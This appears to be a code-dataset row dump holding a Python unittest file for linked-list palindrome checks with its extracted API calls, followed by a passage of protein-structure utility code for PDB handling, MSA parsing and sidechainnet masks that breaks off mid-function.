code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from unittest import TestCase
from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node
from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force
from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse
class TestPalindromeSinglyLinkedList(TestCase):
def setUp(self):
self.pll = PalindromeSinglyLinkedList()
def tearDown(self):
self.pll = None
def test_empty_list(self):
with self.assertRaises(Empty):
self.pll.is_palindrome()
def test_single_element(self):
self.pll.add(1)
self.assertTrue(self.pll.is_palindrome())
def test_two_elements(self):
self.pll.add(1)
self.pll.add(1)
self.assertTrue(self.pll.is_palindrome())
self.pll.remove(1)
self.pll.add(2)
self.assertFalse(self.pll.is_palindrome())
def test_more_than_two_elements_even(self):
self.pll.add(1)
self.pll.add(2)
self.pll.add(2)
self.pll.add(2)
self.assertFalse(self.pll.is_palindrome())
self.pll.remove(2)
self.pll.add(1)
self.assertTrue(self.pll.is_palindrome())
def test_more_than_two_elements_odd(self):
self.pll.add(1)
self.pll.add(2)
self.pll.add(2)
self.assertFalse(self.pll.is_palindrome())
self.pll.remove(2)
self.pll.add(1)
self.assertTrue(self.pll.is_palindrome())
class TestPalindromeBruteForce(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_empty_linked_list(self):
self.assertIsNone(is_palindrome_brute_force(None))
def test_single_element(self):
list = Node(1)
self.assertTrue(is_palindrome_brute_force(list))
def test_two_elements(self):
list = Node(1)
list.next = Node(2)
self.assertFalse(is_palindrome_brute_force(list))
list.next = Node(1)
self.assertTrue(is_palindrome_brute_force(list))
def test_odd_elements(self):
list = Node(1)
list.next = Node(2)
list.next.next = Node(2)
self.assertFalse(is_palindrome_brute_force(list))
list.next.next = Node(1)
self.assertTrue(is_palindrome_brute_force(list))
def test_even_elements(self):
list = Node(1)
list.next = Node(2)
list.next.next = Node(2)
list.next.next.next = Node(3)
self.assertFalse(is_palindrome_brute_force(list))
list.next.next.next = Node(1)
self.assertTrue(is_palindrome_brute_force(list))
class TestPalindromeReverse(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_empty_node(self):
self.assertIsNone(is_palindrome_reverse(None))
def test_single_node(self):
self.assertTrue(is_palindrome_reverse(Node(1)))
def test_two_nodes(self):
l_list = Node(1)
l_list.next = Node(2)
self.assertFalse(is_palindrome_reverse(l_list))
l_list.next = Node(1)
self.assertTrue(is_palindrome_reverse(l_list))
def test_odd_nodes(self):
l_list = Node(1)
l_list.next = Node(2)
l_list.next.next = Node(3)
self.assertFalse(is_palindrome_reverse(l_list))
l_list.next.next = Node(1)
self.assertTrue(is_palindrome_reverse(l_list))
def test_even_nodes(self):
l_list = Node(1)
l_list.next = Node(2)
l_list.next = Node(2)
l_list.next = Node(3)
self.assertFalse(is_palindrome_reverse(l_list))
l_list.next.next = Node(1)
self.assertTrue(is_palindrome_reverse(l_list))
| [
"CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node",
"CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force",
"CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.PalindromeSinglyLinkedList",
"CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse"
] | [((381, 409), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.PalindromeSinglyLinkedList', 'PalindromeSinglyLinkedList', ([], {}), '()\n', (407, 409), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((1752, 1759), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (1756, 1759), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((1866, 1873), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (1870, 1873), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((1894, 1901), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (1898, 1901), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((1982, 1989), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (1986, 1989), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2096, 2103), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (2100, 2103), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2124, 2131), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (2128, 2131), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2157, 2164), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (2161, 2164), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2250, 2257), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (2254, 2257), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2366, 2373), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (2370, 2373), False, 'from 
CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2394, 2401), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (2398, 2401), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2427, 2434), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (2431, 2434), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2465, 2472), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(3)'], {}), '(3)\n', (2469, 2472), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2563, 2570), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (2567, 2570), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2967, 2974), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (2971, 2974), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((2997, 3004), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (3001, 3004), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3085, 3092), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (3089, 3092), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3196, 3203), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (3200, 3203), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3226, 3233), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (3230, 3233), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3261, 3268), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(3)'], {}), '(3)\n', (3265, 3268), False, 'from 
CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3354, 3361), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (3358, 3361), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3467, 3474), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (3471, 3474), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3497, 3504), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (3501, 3504), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3527, 3534), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(2)'], {}), '(2)\n', (3531, 3534), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3557, 3564), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(3)'], {}), '(3)\n', (3561, 3564), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((3649, 3656), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (3653, 3656), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n'), ((1668, 1699), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['None'], {}), '(None)\n', (1693, 1699), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((1784, 1815), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (1809, 1815), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((1928, 1959), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (1953, 1959), False, 'from 
CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((2014, 2045), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (2039, 2045), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((2191, 2222), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (2216, 2222), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((2283, 2314), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (2308, 2314), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((2499, 2530), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (2524, 2530), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((2596, 2627), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_brute_force', 'is_palindrome_brute_force', (['list'], {}), '(list)\n', (2621, 2627), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force\n'), ((2801, 2828), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['None'], {}), '(None)\n', (2822, 2828), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((3031, 3060), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['l_list'], {}), '(l_list)\n', (3052, 3060), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import 
is_palindrome_reverse\n'), ((3117, 3146), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['l_list'], {}), '(l_list)\n', (3138, 3146), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((3295, 3324), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['l_list'], {}), '(l_list)\n', (3316, 3324), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((3387, 3416), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['l_list'], {}), '(l_list)\n', (3408, 3416), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((3590, 3619), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['l_list'], {}), '(l_list)\n', (3611, 3619), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((3682, 3711), 'CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6.is_palindrome_reverse', 'is_palindrome_reverse', (['l_list'], {}), '(l_list)\n', (3703, 3711), False, 'from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse\n'), ((2909, 2916), 'CTCI.Ch2_Linked_Lists.common.SinglyLinkedList.Node', 'Node', (['(1)'], {}), '(1)\n', (2913, 2916), False, 'from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node\n')] |
# utils for working with 3d-protein structures
import os
import numpy as np
import torch
from functools import wraps
from einops import rearrange, repeat
# import torch_sparse # only needed for sparse nth_deg adj calculation
# bio
from Bio import SeqIO
import itertools
import string
# sidechainnet
from sidechainnet.utils.sequence import ProteinVocabulary, ONE_TO_THREE_LETTER_MAP
from sidechainnet.utils.measure import GLOBAL_PAD_CHAR
from sidechainnet.structure.build_info import NUM_COORDS_PER_RES, BB_BUILD_INFO, SC_BUILD_INFO
from sidechainnet.structure.StructureBuilder import _get_residue_build_iter
# build vocabulary
VOCAB = ProteinVocabulary()
# constants
import alphafold2_pytorch.constants as constants
# helpers
def exists(val):
    """ Check whether a value is set (i.e. not None). """
    return not (val is None)
# constants: same as in alphafold2.py
# bucket cutoffs (2-20 Angstroms) shared with the distogram head
DISTANCE_THRESHOLDS = torch.linspace(2, 20, steps = constants.DISTOGRAM_BUCKETS)
# distance binning function
def get_bucketed_distance_matrix(coords, mask, num_buckets = constants.DISTOGRAM_BUCKETS, ignore_index = -100):
    """ Discretize pairwise distances between coords into distogram buckets.
        Inputs:
        * coords: (..., N, 3) float tensor of positions
        * mask: (..., N) boolean mask of valid positions
        * num_buckets: number of distance buckets (cutoffs span 2-20 Angstroms)
        * ignore_index: label assigned to pairs with any invalid endpoint
        Output: (..., N, N) long tensor of bucket indices
    """
    pairwise = torch.cdist(coords, coords, p=2)
    cutoffs = torch.linspace(2, 20, steps = num_buckets, device = coords.device)
    bucketed = torch.bucketize(pairwise, cutoffs[:-1])
    # pairs where either endpoint is masked out get the ignore label
    valid_pair = mask[..., None] & mask[..., None, :]
    bucketed.masked_fill_(~valid_pair, ignore_index)
    return bucketed
# decorators
def set_backend_kwarg(fn):
    """ Decorator: resolve backend='auto' into 'torch' or 'numpy'
        based on the type of the first positional argument, then
        forward it to `fn` as a keyword.
    """
    @wraps(fn)
    def inner(*args, backend = 'auto', **kwargs):
        if backend == 'auto':
            is_tensor = isinstance(args[0], torch.Tensor)
            backend = 'torch' if is_tensor else 'numpy'
        kwargs['backend'] = backend
        return fn(*args, **kwargs)
    return inner
def expand_dims_to(t, length = 3):
    """ Prepend `length` singleton dimensions to `t`.
        Works with both torch tensors and numpy arrays;
        returns `t` unchanged when length == 0.
    """
    if length == 0:
        return t
    lead = (1,) * length
    return t.reshape(*lead, *t.shape)
def expand_arg_dims(dim_len = 3):
    """ pack here for reuse.
        turns input into (B x D x N): pads both tensor arguments with
        leading singleton dims until each has `dim_len` dimensions.
    """
    def outer(fn):
        @wraps(fn)
        def inner(x, y, **kwargs):
            assert len(x.shape) == len(y.shape), "Shapes of A and B must match."
            missing = dim_len - len(x.shape)
            x, y = (expand_dims_to(t, length = missing) for t in (x, y))
            return fn(x, y, **kwargs)
        return inner
    return outer
def invoke_torch_or_numpy(torch_fn, numpy_fn):
    """ Decorator factory. The wrapped `fn` prepares positional args
        (optionally followed by a trailing kwargs dict); they are then
        forwarded to the torch or numpy implementation, selected by the
        mandatory `backend` keyword argument.
    """
    def outer(fn):
        @wraps(fn)
        def inner(*args, **kwargs):
            backend = kwargs.pop('backend')
            prepared = list(fn(*args, **kwargs))
            # a trailing dict carries keyword arguments for the backend fn
            passed_kwargs = prepared.pop() if isinstance(prepared[-1], dict) else {}
            chosen = torch_fn if backend == 'torch' else numpy_fn
            return chosen(*prepared, **passed_kwargs)
        return inner
    return outer
# preprocess data
def get_atom_ids_dict():
    """ Get's a dict mapping each atom to a token. """
    # padding slot "" plus the four backbone atoms are always present
    names = set(["", "N", "CA", "C", "O"])
    for info in SC_BUILD_INFO.values():
        names.update(info["atom-names"])
    return {name: i for i, name in enumerate(sorted(names))}
def make_cloud_mask(aa):
    """ 14-slot mask for one residue: 1 where an atom exists, 0 for padding. """
    mask = np.zeros(14)
    # the padding residue "_" has no atoms at all
    if aa == "_":
        return mask
    # backbone (N, CA, C, O) plus this residue's sidechain atoms
    n_atoms = 4 + len(SC_BUILD_INFO[ONE_TO_THREE_LETTER_MAP[aa]]["atom-names"])
    mask[:n_atoms] = 1
    return mask
def make_atom_id_embedds(aa, atom_ids):
    """ Return the tokens for each atom in the aa.
        Inputs:
        * aa: str. one-letter amino acid code ("_" is the padding residue)
        * atom_ids: dict mapping atom names to int tokens (see get_atom_ids_dict)
        Output: (14,) numpy array of atom-type tokens (0 for padding slots)
    """
    tokens = np.zeros(14)
    # early stop if padding token
    if aa == "_":
        return tokens
    # backbone atoms first, then this residue's sidechain atoms
    atom_list = ["N", "CA", "C", "O"] + SC_BUILD_INFO[ ONE_TO_THREE_LETTER_MAP[aa] ]["atom-names"]
    for i, atom in enumerate(atom_list):
        # bug fix: previously read the module-level ATOM_IDS global and ignored
        # the `atom_ids` parameter; use the parameter so callers control the vocab
        tokens[i] = atom_ids[atom]
    return tokens
# token id for every atom name appearing in sidechainnet's build info
ATOM_IDS = get_atom_ids_dict()
# per-residue precomputed data in the 14-slot sidechainnet layout:
# atom-presence mask and atom-type tokens; "_" is the padding residue
CUSTOM_INFO = {k: {"cloud_mask": make_cloud_mask(k),
                   "atom_id_embedd": make_atom_id_embedds(k, atom_ids=ATOM_IDS),
                   } for k in "ARNDCQEGHILKMFPSTWYV_"}
# common utils
# parsing to pdb for easier visualization - other example from sidechainnet is:
# https://github.com/jonathanking/sidechainnet/tree/master/sidechainnet/structure
def download_pdb(name, route):
    """ Downloads a PDB entry from the RCSB PDB.
        Inputs:
        * name: str. the PDB entry id. 4 characters, capitalized.
        * route: str. route of the destin file. usually ".pdb" extension
        Output: route of destin file
    """
    # NOTE: shells out to `curl`, which must be available on the host
    url = f"https://files.rcsb.org/download/{name}.pdb"
    os.system(f"curl {url} > {route}")
    return route
def clean_pdb(name, route=None, chain_num=None):
    """ Cleans the structure to only leave the important part.
        Inputs:
        * name: str. route of the input .pdb file
        * route: str. route of the output. will overwrite input if not provided
        * chain_num: int. index of chain to select (1-indexed as pdb files)
        Output: route of destin file.
    """
    # NOTE(review): the docstring says chain_num is 1-indexed, but below it is
    # compared against mdtraj's 0-indexed chain.index — confirm which is intended
    import mdtraj
    destin = route if route is not None else name
    # read input
    raw_prot = mdtraj.load_pdb(name)
    # iterate over prot and select the specified chains
    idxs = []
    for chain in raw_prot.topology.chains:
        # if arg passed, only select that chain
        if chain_num is not None:
            if chain_num != chain.index:
                continue
        # select indexes of chain
        chain_idxs = raw_prot.topology.select(f"chainid == {str(chain.index)}")
        idxs.extend( chain_idxs.tolist() )
    # sort: topology and xyz selection are ordered
    idxs = sorted(idxs)
    # get new trajectory from the sleected subset of indexes and save
    prot = mdtraj.Trajectory(xyz=raw_prot.xyz[:, idxs],
                             topology=raw_prot.topology.subset(idxs))
    prot.save(destin)
    return destin
def custom2pdb(coords, proteinnet_id, route):
    """ Takes a custom representation and turns into a .pdb file.
        Inputs:
        * coords: array/tensor of shape (3 x N) or (N x 3). in Angstroms.
                  same order as in the proteinnnet is assumed (same as raw pdb file)
        * proteinnet_id: str. proteinnet id format (<class>#<pdb_id>_<chain_number>_<chain_id>)
                         see: https://github.com/aqlaboratory/proteinnet/
        * route: str. destin route.
        Output: tuple of routes: (original, generated) for the structures.
    """
    import mdtraj
    # convert to numpy
    if isinstance(coords, torch.Tensor):
        coords = coords.detach().cpu().numpy()
    # ensure (1, N, 3) as mdtraj expects (frames, atoms, 3).
    # bug fix: previously transposed (N, 3) inputs (backwards w.r.t. the stated
    # goal) and called `np.newaxis(...)`, which raises — np.newaxis is None.
    if coords.shape[0] == 3:
        coords = coords.T
    coords = coords[np.newaxis, ...]
    # get pdb id and chain num
    pdb_name, chain_num = proteinnet_id.split("#")[-1].split("_")[:-1]
    pdb_destin = "/".join(route.split("/")[:-1])+"/"+pdb_name+".pdb"
    # download pdb file and select appropiate
    download_pdb(pdb_name, pdb_destin)
    # NOTE(review): chain_num here is a str, while clean_pdb compares it to an
    # int chain.index — confirm the expected type before relying on selection
    clean_pdb(pdb_destin, chain_num=chain_num)
    # load trajectory scaffold and replace coordinates - assumes same order
    scaffold = mdtraj.load_pdb(pdb_destin)
    scaffold.xyz = coords
    scaffold.save(route)
    return pdb_destin, route
def coords2pdb(seq, coords, cloud_mask, prefix="", name="af2_struct.pdb"):
    """ Turns coordinates into PDB files ready to be visualized.
        Inputs:
        * seq: (L,) tensor of ints (sidechainnet aa-key pairs)
        * coords: (3, N) coords of atoms
        * cloud_mask: (L, C) boolean mask of occupied spaces in scn format
        * prefix: str. directory to save files.
        * name: str. name of destin file (ex: pred1.pdb)
    """
    # bug fix: `scn` was never imported (NameError on every call)
    import sidechainnet as scn
    # bug fix: torch.zeros(cloud_mask.shape, 3) mixes a size tuple with an int
    # and raises TypeError; unpack the shape instead
    scaffold = torch.zeros(*cloud_mask.shape, 3)
    scaffold[cloud_mask] = coords.cpu().float()
    # build structures and save
    pred = scn.StructureBuilder( seq, crd=scaffold )
    pred.to_pdb(prefix+name)
# adapted from https://github.com/facebookresearch/esm
def remove_insertions(sequence: str) -> str:
    """ Removes any insertions into the sequence. Needed to load aligned sequences in an MSA. """
    # lowercase letters plus '.' and '*' mark insertions / gaps in aligned MSAs
    to_delete = {ch: None for ch in string.ascii_lowercase}
    to_delete["."] = None
    to_delete["*"] = None
    return sequence.translate(str.maketrans(to_delete))
def read_msa(filename: str, nseq: int):
    """ Reads the first nseq sequences from an MSA file, automatically removes insertions."""
    records = itertools.islice(SeqIO.parse(filename, "fasta"), nseq)
    return [(rec.description, remove_insertions(str(rec.seq))) for rec in records]
# sidechainnet / MSA / other data utils
def ids_to_embed_input(x):
    """ Returns the amino acid string input for calculating the ESM and MSA transformer embeddings
        Inputs:
        * x: any deeply nested list of integers that correspond with amino acid id
    """
    assert isinstance(x, list), 'input must be a list'
    id2aa = VOCAB._int2char
    out = []
    for item in x:
        if isinstance(item, list):
            converted = ids_to_embed_input(item)
        elif isinstance(item, int):
            converted = id2aa[item]
        else:
            raise TypeError('type must be either list or character')
        out.append(converted)
    # a fully-flat level collapses to a single (label, sequence) pair
    if all(isinstance(entry, str) for entry in out):
        return (None, ''.join(out))
    return out
def get_msa_embedd(msa, embedd_model, batch_converter, device = None):
    """ Returns the MSA_tr embeddings for a protein.
        Inputs:
        * msa: ( (b,) n_seqs, L) tensor of ints (in sidechainnet int-char convention)
        * embedd_model: MSA_tr model (see train_end2end.py for an example)
        * batch_converter: MSA_tr batch converter (see train_end2end.py for an example)
        * device: optional torch device for the forward pass;
                  defaults to the embedding model's own device.
        Outputs: tensor of (batch, n_seqs, L, embedd_dim)
        * n_seqs: number of sequences in the MSA
        * embedd_dim: number of embedding dimensions. 768 for MSA_Transformer
    """
    # use MSA transformer
    REPR_LAYER_NUM = 12
    # bug fix: the `device` argument was unconditionally clobbered; honor it when given
    if device is None:
        device = embedd_model.device
    embedd_inputs = ids_to_embed_input(msa.cpu().tolist())
    msa_batch_labels, msa_batch_strs, msa_batch_tokens = batch_converter(embedd_inputs)
    with torch.no_grad():
        results = embedd_model(msa_batch_tokens.to(device), repr_layers=[REPR_LAYER_NUM], return_contacts=False)
    # index 0 is for start token. so take from 1 one
    token_reps = results["representations"][REPR_LAYER_NUM][..., 1:, :]
    return token_reps
def get_esm_embedd(seq, embedd_model, batch_converter, msa_data=None):
    """ Returns the ESM embeddings for a protein.
        Inputs:
        * seq: ( (b,) L,) tensor of ints (in sidechainnet int-char convention)
        * embedd_model: ESM model (see train_end2end.py for an example)
        * batch_converter: ESM batch converter (see train_end2end.py for an example)
        * msa_data: unused; kept for signature compatibility.
        Outputs: tensor of (batch, n_seqs, L, embedd_dim)
        * n_seqs: number of sequences in the MSA. 1 for ESM-1b
        * embedd_dim: number of embedding dimensions. 1280 for ESM-1b
    """
    # use ESM transformer
    device = embedd_model.device
    REPR_LAYER_NUM = 33
    embedd_inputs = ids_to_embed_input(seq.cpu().tolist())
    batch_labels, batch_strs, batch_tokens = batch_converter(embedd_inputs)
    with torch.no_grad():
        results = embedd_model(batch_tokens.to(device), repr_layers=[REPR_LAYER_NUM], return_contacts=False)
    # index 0 is for start token, so take from 1 on; add n_seqs dim (1 for ESM-1b)
    token_reps = results["representations"][REPR_LAYER_NUM][..., 1:, :].unsqueeze(dim=1)
    return token_reps
def get_all_protein_ids(dataloader, verbose=False):
    """ Given a sidechainnet dataloader for a CASP version,
        Returns all the ids belonging to proteins.
        Inputs:
        * dataloader: a sidechainnet dataloader for a CASP version
        * verbose: bool. print the entries that get skipped.
        Outputs: a set containing the ids for all protein entries.
    """
    # store ids here
    ids = set()
    # bug fix: previously iterated the undefined global `dataloaders['train']`
    # (wrapped in tqdm, which is not imported) instead of the argument.
    for batch in dataloader:
        # for breaking from 2 loops at once
        try:
            for i in range(batch.int_seqs.shape[0]):
                pid = batch.pids[i]
                # check if all fragments are : 4_LETTER_PDB + NUM + CHAIN
                max_len_10 = len(pid) < 10
                fragments = [len(x) <= 4 for x in pid.split("_")]
                fragments_under_4 = sum(fragments) == len(fragments)  # AND CONDITION
                # record id
                if max_len_10 and fragments_under_4:
                    ids.add(pid)
                elif verbose:
                    print("skip:", pid, "under 4", fragments)
        except StopIteration:
            break
    # returns set of ids
    return ids
def scn_cloud_mask(scn_seq, boolean=True, coords=None):
    """ Gets the boolean mask atom positions (not all aas have same atoms).
        Inputs:
        * scn_seq: (batch, length) sequence as provided by Sidechainnet package
        * boolean: whether to return as array of idxs or boolean values
        * coords: optional .(batch, lc, 3). sidechainnet coords.
                  returns the true mask (solves potential atoms that might not be provided)
        Outputs: (batch, length, NUM_COORDS_PER_RES) boolean mask
    """
    scn_seq = expand_dims_to(scn_seq, 2 - len(scn_seq.shape))
    # when coords are given, derive the mask from which atom slots are filled
    if coords is not None:
        per_atom = rearrange(coords, '... (l c) d -> ... l c d', c=14)
        batch_mask = (per_atom == 0).sum(dim=-1) < coords.shape[-1]
        return batch_mask.bool() if boolean else batch_mask.nonzero()
    # otherwise build the mask from residue identities; loop on cpu
    device = scn_seq.device
    masks = []
    for seq in scn_seq.cpu().tolist():
        residue_masks = [CUSTOM_INFO[VOCAB.int2char(aa)]['cloud_mask'] for aa in seq]
        masks.append(torch.tensor(residue_masks).bool().to(device).unsqueeze(0))
    # concat in last dim
    batch_mask = torch.cat(masks, dim=0)
    # return mask (boolean or indexes)
    return batch_mask.bool() if boolean else batch_mask.nonzero()
def scn_backbone_mask(scn_seq, boolean=True, n_aa=3):
    """ Gets the boolean mask for N and CA positions.
        Inputs:
        * scn_seq: sequence(s) as provided by Sidechainnet package (int tensor/s)
        * n_aa: number of atoms in a backbone. (may include cbeta as 4th pos)
        * boolean: whether to return as array of idxs or boolean values
        Outputs: (N_mask, CA_mask, C_mask)
    """
    template = torch.zeros(*scn_seq.shape, n_aa).to(scn_seq.device)
    # tag the three backbone slots of every residue: N=1, CA=2, C=3
    for pos in range(3):
        template[..., pos] = pos + 1
    flat = rearrange(template, '... l c -> ... (l c)')
    masks = (flat == 1, flat == 2, flat == 3)
    if boolean:
        return masks
